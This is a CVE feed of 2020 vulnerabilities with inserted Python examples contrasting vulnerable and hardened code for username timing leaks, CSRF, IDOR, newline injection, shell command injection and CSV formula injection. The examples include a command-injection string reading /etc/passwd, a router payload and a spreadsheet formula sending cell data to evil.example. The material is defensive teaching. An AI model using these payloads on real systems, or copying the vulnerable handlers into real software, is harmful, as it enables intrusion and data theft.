Latest CVE Feed
- CVE-2020-9391 | 5.5 MEDIUM
  An issue was discovered in the Linux kernel 5.4 and 5.5 through 5.5.6 on the AArch64 architecture. It ignores the top byte in the address passed to the brk system call, potentially moving the memory break downwards when the application expects it to move ...
  Published: Feb. 25, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9390 | 5.4 MEDIUM
  SquaredUp allowed Stored XSS before version 4.6.0. A user was able to create a dashboard that executed malicious content in an iframe, or by uploading an SVG that contained a script...
  Affected Products: squaredup
  Published: Feb. 03, 2021 | Modified: Nov. 21, 2024
- CVE-2020-9389 | 4.3 MEDIUM
  A username enumeration issue was discovered in SquaredUp before version 4.6.0. The login functionality was implemented in a way that enabled a malicious user to guess valid usernames, because the response time for a valid username differed from that for an invalid one...
  Affected Products: squaredup
  Published: Feb. 03, 2021 | Modified: Nov. 21, 2024
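The response-time difference behind CVE-2020-9389 usually comes from a login routine that only runs the slow password hash when the username exists. The following added example (not SquaredUp's code; the user table, KDF parameters and session names are constructed) shows that pattern beside the usual fix, which does the same hashing work on a dummy record for unknown users and compares in constant time. A call counter makes the work difference visible deterministically; the `median_latency_ns` helper is what a remote attacker would actually measure.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed example, not SquaredUp's code: a login routine that runs the
# password KDF only for known users leaks which usernames exist, because the
# unknown-user path returns measurably faster.

def derive(password: bytes, salt: bytes) -> bytes:
    """Deliberately slow KDF; its presence or absence is what leaks."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 50_000)

# Constructed user table: username -> (salt, derived key).
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, derive(b"correct horse", _SALT))}

# Dummy credential for the unknown-user path so both paths do equal work.
_DUMMY_SALT = os.urandom(16)
_DUMMY_KEY = derive(secrets.token_bytes(32), _DUMMY_SALT)

KDF_CALLS = 0  # instrumentation: KDF runs performed by the last login attempt

def counted_derive(password: bytes, salt: bytes) -> bytes:
    global KDF_CALLS
    KDF_CALLS += 1
    return derive(password, salt)

def login_vulnerable(username: str, password: bytes) -> bool:
    rec = USERS.get(username)
    if rec is None:
        return False                      # early return: no KDF run at all
    salt, key = rec
    return hmac.compare_digest(counted_derive(password, salt), key)

def login_hardened(username: str, password: bytes) -> bool:
    # Always run the KDF (against a dummy record when the user is unknown)
    # and compare in constant time, so latency does not depend on whether
    # the username exists.
    salt, key = USERS.get(username, (_DUMMY_SALT, _DUMMY_KEY))
    matched = hmac.compare_digest(counted_derive(password, salt), key)
    return matched and username in USERS

def kdf_calls(login, username: str, password: bytes) -> int:
    """Number of KDF runs one login attempt performed."""
    global KDF_CALLS
    KDF_CALLS = 0
    login(username, password)
    return KDF_CALLS

def median_latency_ns(login, username: str, password: bytes, rounds: int = 5) -> int:
    """Median wall-clock latency of a login attempt, as a remote attacker sees it."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter_ns()
        login(username, password)
        samples.append(time.perf_counter_ns() - t0)
    return sorted(samples)[len(samples) // 2]

if __name__ == "__main__":
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        known = median_latency_ns(fn, "alice", b"wrong")
        unknown = median_latency_ns(fn, "nobody", b"wrong")
        print(f"{name}: known user {known / 1e6:.2f} ms, unknown user {unknown / 1e6:.2f} ms")
```

Running the block prints the two latencies per variant; on the vulnerable routine the unknown-user case is orders of magnitude faster, on the hardened one the two are within noise. The same idea applies to any other step that is skipped for unknown users (MFA lookup, lockout counters), which is why the fix is usually framed as "every failure path does the same work".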
- CVE-2020-9388 | 6.5 MEDIUM
  CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have caused an administrator to execute arbitrary code in an HTML dashboard tile via a crafted HTML page, or to upload a malicious SVG payload into a dashboa...
  Affected Products: squaredup
  Published: Feb. 03, 2021 | Modified: Nov. 21, 2024
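The CSRF scenario in CVE-2020-9388 needs only that the state-changing request (saving a dashboard tile) is accepted on the strength of the victim administrator's session cookie, which a cross-site form post carries automatically. The added example below (not SquaredUp's code; the session store, tile store, origin and header names are constructed) shows such a handler next to one protected by a per-session synchronizer token and an Origin check.

```python
import hashlib
import hmac
import secrets

# Constructed example, not SquaredUp's code. Saving an HTML dashboard tile is a
# state-changing action; the unprotected handler accepts any request that
# carries the admin's session cookie, which is exactly what a cross-site form
# post delivers.

SITE_ORIGIN = "https://dashboards.example"       # assumption: our own origin
_SERVER_SECRET = secrets.token_bytes(32)         # per-deployment secret

SESSIONS = {"sess-admin": {"user": "admin", "role": "admin"}}   # cookie -> session
TILES = {}                                                      # tile_id -> html

def csrf_token(session_id: str) -> str:
    # Bound to the session, so a token issued to one user is useless for another.
    return hmac.new(_SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def save_tile_vulnerable(session_id: str, form: dict, headers: dict) -> str:
    sess = SESSIONS.get(session_id)
    if sess is None or sess["role"] != "admin":
        raise PermissionError("not an admin")
    TILES[form["tile_id"]] = form["html"]        # attacker-chosen HTML lands here
    return form["tile_id"]

def save_tile_hardened(session_id: str, form: dict, headers: dict) -> str:
    sess = SESSIONS.get(session_id)
    if sess is None or sess["role"] != "admin":
        raise PermissionError("not an admin")
    # 1. Origin must be our own site (browsers set Origin on cross-site POSTs,
    #    and a missing Origin is treated as cross-site here).
    if headers.get("Origin") != SITE_ORIGIN:
        raise PermissionError("cross-site request rejected (Origin)")
    # 2. The synchronizer token must match the one issued for this session.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token(session_id).encode()):
        raise PermissionError("cross-site request rejected (token)")
    TILES[form["tile_id"]] = form["html"]
    return form["tile_id"]

def rejected(handler, session_id: str, form: dict, headers: dict) -> bool:
    """True if the handler refused the request."""
    try:
        handler(session_id, form, headers)
        return False
    except PermissionError:
        return True
```

The token is the primary control; the Origin check is defence in depth for the case where a token leaks through a separate bug. Both checks sit after the role check on purpose: an unauthenticated request should fail the same way whether or not it is cross-site.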
- CVE-2020-9387 | 4.3 MEDIUM
  In Mahara 19.04 before 19.04.5 and 19.10 before 19.10.3, account details are shared in the Elasticsearch results for accounts that are not accessible when the config setting 'Isolated institutions' is turned on...
  Affected Products: mahara
  Published: Apr. 30, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9386 | 4.3 MEDIUM
  In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore...
  Affected Products: mahara
  Published: Mar. 09, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9385 | 7.5 HIGH
  A NULL Pointer Dereference exists in libzint in Zint 2.7.1 because multiple + characters are mishandled in add_on in upcean.c, when called from eanx in upcean.c during EAN barcode generation...
  Affected Products: zint
  Published: Feb. 25, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9384 | 8.8 HIGH
  An Insecure Direct Object Reference (IDOR) vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may on...
  Affected Products: roc_partner_settlement
  Published: Apr. 14, 2020 | Modified: Nov. 21, 2024
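An IDOR in a change-password form means the handler takes the account to modify from a client-controlled parameter instead of from the server-side session. The added example below (not Subex's code; user table, session store, parameter names and the re-authentication step are constructed assumptions) shows that handler beside a hardened one that derives the target from the session and re-proves the current password.

```python
import hashlib
import hmac
import os

# Constructed example, not Subex's code. The vulnerable handler trusts a
# user_id POST parameter, so any authenticated user can reset another
# account's password. The fix takes the target from the session and requires
# the current password, so a stolen session alone cannot rotate it either.

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

def _record(password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "key": _hash(password, salt)}

USERS = {"admin": _record("adm1n-secret"), "mallory": _record("mallory-pw")}
SESSIONS = {"sess-mallory": "mallory"}          # cookie -> authenticated user

def verify_password(username: str, password: str) -> bool:
    rec = USERS[username]
    return hmac.compare_digest(_hash(password, rec["salt"]), rec["key"])

def change_password_vulnerable(session_id: str, post: dict) -> str:
    if session_id not in SESSIONS:
        raise PermissionError("login required")
    target = post["user_id"]                    # trusted straight from the client
    USERS[target] = _record(post["new_password"])
    return target

def change_password_hardened(session_id: str, post: dict) -> str:
    actor = SESSIONS.get(session_id)
    if actor is None:
        raise PermissionError("login required")
    # The account being changed is the logged-in account; a user_id in the
    # body is accepted only if it agrees with the session.
    if post.get("user_id", actor) != actor:
        raise PermissionError("cannot change another account's password")
    # Re-authenticate so a hijacked session alone cannot rotate the password.
    if not verify_password(actor, post.get("current_password", "")):
        raise PermissionError("current password incorrect")
    USERS[actor] = _record(post["new_password"])
    return actor

def is_rejected(handler, session_id: str, post: dict) -> bool:
    """True if the handler refused the request."""
    try:
        handler(session_id, post)
        return False
    except PermissionError:
        return True
```

A privileged "reset another user's password" flow, if the product needs one, belongs in a separate endpoint with its own role check and audit log, not in the self-service handler with a widened parameter.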
- CVE-2020-9383 | 7.1 HIGH
  An issue was discovered in the Linux kernel 3.16 through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2...
  Affected Products: linux_kernel ubuntu_linux debian_linux leap active_iq_unified_manager solidfire_baseboard_management_controller_firmware h410c_firmware cloud_backup hci_management_node solidfire +4 more products
  Published: Feb. 25, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9382 | 5.5 MEDIUM
  An issue was discovered in the Widgets extension through 1.4.0 for MediaWiki. Improper title sanitization allowed for the execution of any wiki page as a widget (as defined by this extension) via MediaWiki's {{#widget:}} parser function...
  Affected Products: widgets
  Published: Feb. 24, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9381 | 7.5 HIGH
  controllers/admin.js in Total.js CMS 13 allows remote attackers to execute arbitrary code via a POST to the /admin/api/widgets/ URI. This can be exploited in conjunction with CVE-2019-15954...
  Affected Products: total.js_cms
  Published: Feb. 24, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9380 | 9.8 CRITICAL
  IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script...
  Affected Products: web_tv_player
  Published: Mar. 05, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9379 | 6.5 MEDIUM
  The Software Development Kit of the MiContact Center Business with Site Based Security 8.0 through 9.0.1.0 before KB496276 allows an authenticated user to access sensitive information. A successful exploit could allow unauthorized access to user conversat...
  Affected Products: micontact_center_business
  Published: Feb. 25, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9376 | 7.5 HIGH
  D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer...
  Published: Jul. 09, 2020 | Modified: Nov. 21, 2024
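The payload quoted for CVE-2020-9376 is a newline-injection pattern: the `%0A` in the SERVICES value decodes to a line break, so when the CGI script forwards the value into a line-oriented request for the device's configuration backend, `AUTHORIZED_GROUP=1` arrives as a second directive that the backend reads as "this caller is authorized". The added example below models that flow (not D-Link's code; the directive format, the service names, the allowlist and the backend behaviour are all assumptions) and the two checks that close it: reject control characters in the parameter, and decide authorization server-side rather than from anything in the request body.

```python
from urllib.parse import parse_qs

# Constructed example, not D-Link's code. A CGI endpoint turns the SERVICES
# query parameter into a newline-delimited request for a backend config daemon
# (the message format here is an assumption). A URL-encoded newline (%0A) in
# the parameter lets the caller append a directive of their own.

PUBLIC_SERVICES = {"DEVICE.TIME", "DEVICE.LOG"}   # assumed: readable without login
PROTECTED_SERVICES = {"DEVICE.ACCOUNT"}           # assumed: holds credentials

def build_request_vulnerable(query: str, authenticated: bool) -> list[str]:
    params = parse_qs(query)                     # parse_qs already %-decodes values
    services = params.get("SERVICES", [""])[0]
    lines = [f"SERVICES={services}"]
    if authenticated:
        lines.append("AUTHORIZED_GROUP=1")
    # The daemon parses line by line, so an embedded "\n" becomes a new directive.
    return "\n".join(lines).split("\n")

def backend_allows(directives: list[str]) -> dict[str, bool]:
    """Models the daemon: a service is served if it is public or if the request
    carries AUTHORIZED_GROUP=1 anywhere in the directive list."""
    authorized = "AUTHORIZED_GROUP=1" in directives
    wanted = [d.split("=", 1)[1] for d in directives if d.startswith("SERVICES=")]
    result = {}
    for svc in wanted:
        for name in svc.split(","):
            result[name] = name in PUBLIC_SERVICES or authorized
    return result

def build_request_hardened(query: str, authenticated: bool) -> list[str]:
    params = parse_qs(query)
    services = params.get("SERVICES", [""])[0]
    # 1. No control characters: the value must never carry a protocol delimiter.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in services):
        raise ValueError("control character in SERVICES")
    # 2. Every requested name must be a known service.
    names = services.split(",")
    known = PUBLIC_SERVICES | PROTECTED_SERVICES
    for n in names:
        if n not in known:
            raise ValueError(f"unknown service {n!r}")
    # 3. Authorization is decided here, from session state, never from the request.
    if not authenticated and any(n in PROTECTED_SERVICES for n in names):
        raise PermissionError("authentication required")
    lines = [f"SERVICES={services}"]
    if authenticated:
        lines.append("AUTHORIZED_GROUP=1")
    return lines

def hardened_outcome(query: str, authenticated: bool) -> str:
    """Summarise what the hardened builder does with a query string."""
    try:
        build_request_hardened(query, authenticated)
        return "accepted"
    except (ValueError, PermissionError) as exc:
        return f"rejected: {exc}"
```

Step 3 is the one that matters most: even with the control-character check in place, a backend that grants access on the basis of a flag carried in the request is one encoding trick away from the same bug, so the flag should be set by the front end from its own session check and nothing in the client's data should be able to produce it.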
- CVE-2020-9375 | 7.8 HIGH
  TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allow remote attackers to cause a denial of service via a crafted HTTP header containing an unexpected Referer field...
  Published: Mar. 25, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9374 | 9.8 CRITICAL
  On TP-Link TL-WR849N 0.9.1 4.16 devices, a remote command execution vulnerability in the diagnostics area can be exploited when an attacker sends specific shell metacharacters to the panel's traceroute feature...
  Published: Feb. 24, 2020 | Modified: Nov. 21, 2024
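A diagnostics page that runs traceroute by interpolating the user-supplied host into a shell command line is the textbook shape of the CVE-2020-9374 class: whatever follows a `;`, `|` or backtick runs as a second command. The added example below (not TP-Link firmware code; the option set, the hostname grammar and the `injected_commands` approximation of shell splitting are assumptions) shows the vulnerable construction next to the two-part fix, validate the host strictly and pass it as a single argv element with no shell involved.

```python
import ipaddress
import re
import subprocess

# Constructed example, not TP-Link firmware code. Interpolating the target
# into a shell string lets metacharacters run extra commands; the fix
# validates the host and hands it to traceroute as one argv element.

# Hostname per RFC 1123 label rules: 1-63 alnum/hyphen chars per label, no
# leading or trailing hyphen, total length <= 253 (assumed acceptable grammar).
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def build_command_vulnerable(host: str) -> str:
    # Passed to the shell via system()/popen(): "8.8.8.8; cat /etc/passwd" runs both.
    return f"traceroute -n {host}"

def injected_commands(cmdline: str) -> list[str]:
    """Approximate how a POSIX shell would split the line into separate commands."""
    return [part for part in re.split(r"\s*(?:;|&&|\|\||\||\n)\s*", cmdline) if part]

def validate_host(host: str) -> str:
    """Return the host if it is a literal IP or a well-formed hostname, else raise."""
    try:
        return str(ipaddress.ip_address(host))       # literal IPv4/IPv6
    except ValueError:
        pass
    if _HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")

def is_valid_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False

def build_command_hardened(host: str) -> list[str]:
    # argv list: the host is exactly one argument and is never reparsed by a
    # shell. validate_host also rejects a leading '-', so the host cannot be
    # mistaken for an option.
    return ["traceroute", "-n", validate_host(host)]

def run_traceroute(host: str, timeout: float = 30.0) -> str:
    argv = build_command_hardened(host)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return done.stdout
```

`run_traceroute` is the only function that touches the system and is not exercised by the checks; the others can be unit-tested offline. An allowlist of characters is preferred over blocklisting metacharacters because the set of characters a given shell treats specially (and the encodings a web front end decodes before the shell sees them) is larger than most blocklists anticipate.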
- CVE-2020-9372 | 7.8 HIGH
  The Appointment Booking Calendar plugin before 1.3.35 for WordPress allows user input (in fields such as Description or Name) in any booking form to be any formula, which then could be exported via the Bookings list tab in /wp-admin/admin.php?page=cpabc_a...
  Affected Products: appointment_booking_calendar
  Published: Mar. 04, 2020 | Modified: Nov. 21, 2024
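CVE-2020-9372 is CSV/formula injection: a booking whose Name or Description starts with `=`, `+`, `-` or `@` is written verbatim into the exported spreadsheet, and the administrator's spreadsheet application evaluates it on open. The added example below (not the plugin's code; the column names and sample bookings are constructed) shows an export that copies cells verbatim beside one that neutralises formula-leading cells, together with a helper that flags which cells of a given CSV a spreadsheet would evaluate.

```python
import csv
import io

# Constructed example, not the plugin's code. Spreadsheet applications treat a
# cell beginning with '=', '+', '-' or '@' (or with a tab/CR in front of one)
# as a formula, so user text that starts that way executes when the exported
# CSV is opened.

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
FIELDS = ["name", "description"]   # assumed export columns

def export_vulnerable(rows: list[dict]) -> str:
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=FIELDS)
    w.writeheader()
    for r in rows:
        w.writerow(r)                    # user text copied verbatim into cells
    return buf.getvalue()

def neutralize_cell(value: str) -> str:
    """Prefix a single quote so the spreadsheet stores the text literally.
    Leading spaces are ignored when deciding, because ' =cmd' is still
    evaluated by applications that trim the cell first."""
    if value.lstrip(" ").startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

def export_hardened(rows: list[dict]) -> str:
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL)
    w.writeheader()
    for r in rows:
        w.writerow({k: neutralize_cell(str(v)) for k, v in r.items()})
    return buf.getvalue()

def cells_that_would_execute(csv_text: str) -> list[str]:
    """Cells of a CSV that a spreadsheet would interpret as formulas."""
    reader = csv.reader(io.StringIO(csv_text))
    next(reader)                         # skip header row
    return [c for row in reader for c in row if c.lstrip(" ").startswith(FORMULA_TRIGGERS)]

# Constructed sample bookings; the second and third carry formula payloads.
BOOKINGS = [
    {"name": "Alice", "description": "Follow-up visit"},
    {"name": '=HYPERLINK("http://evil.example/?"&A1,"click")', "description": "see link"},
    {"name": "Bob", "description": "\t=2+3"},
]
```

The single-quote prefix is the defence recommended for CSV because the format carries no cell types; it does show up as a literal quote in some importers, which is the accepted cost. Apply `neutralize_cell` only to free-text columns: a phone-number column legitimately starting with `+` would otherwise be mangled, and for such columns the right fix is a typed export (XLSX with string cells) rather than quoting.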
- CVE-2020-9371 | 4.8 MEDIUM
  Stored XSS exists in the Appointment Booking Calendar plugin before 1.3.35 for WordPress. In the cpabc_appointments.php file, the Calendar Name input could allow attackers to inject arbitrary JavaScript or HTML...
  Affected Products: appointment_booking_calendar
  Published: Mar. 04, 2020 | Modified: Nov. 21, 2024
- 9.1 CRITICAL
  Published: Mar. 05, 2020 | Modified: Nov. 21, 2024
- CVE-2020-9369 | 7.5 HIGH
  Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters...
  Published: Feb. 24, 2020 | Modified: Nov. 21, 2024